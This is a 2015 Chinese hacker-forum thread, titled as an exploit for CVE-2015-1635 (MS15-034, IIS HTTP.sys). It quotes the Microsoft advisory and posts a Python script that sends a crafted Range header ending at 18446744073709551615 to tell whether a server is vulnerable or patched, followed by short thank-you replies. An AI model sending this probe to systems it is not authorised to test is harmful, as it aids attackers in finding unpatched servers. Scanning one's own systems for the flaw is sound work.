90_ 发表于 2015-4-15 15:51:43

CVE-2015-1635 (MS15-034) Exploit

https://technet.microsoft.com/library/security/MS15-034

此安全更新可修复 Microsoft Windows 中的漏洞。 如果攻击者向受影响的 Windows 系统发送经特殊设计的的 HTTP 请求,此漏洞可能允许远程执行代码。
对于 Windows 7、Windows 8、Windows Server 2008 R2 和 Windows Server 2012 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅“受影响的软件”部分。
import socket
import random
 
ipAddr = ""
hexAllFfff = "18446744073709551615"
 
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
 
print " Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
                print " Not IIS"
                exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
                print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
                print " Looks Patched"
else:
                print " Unexpected response, cannot discern patch status"

CHRIS 发表于 2015-6-29 05:11:15

还是不错的哦,顶了

小龙 发表于 2015-6-29 14:25:08

感谢楼主的分享~

Lucifer 发表于 2015-6-30 09:18:59

感谢楼主的分享~

ayang 发表于 2015-7-1 12:18:32

学习学习技术,加油!

54hacker 发表于 2015-7-1 13:21:30

感谢楼主的分享~

云游者 发表于 2015-7-2 07:29:55

支持,看起来不错呢!

ljy07 发表于 2015-7-2 07:31:57

感谢楼主的分享~

yusiii 发表于 2015-7-2 11:16:16

学习学习技术,加油!

ayang 发表于 2015-7-2 15:43:12

支持中国红客联盟(ihonker.org)
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: CVE-2015-1635 (MS15-034) Exploit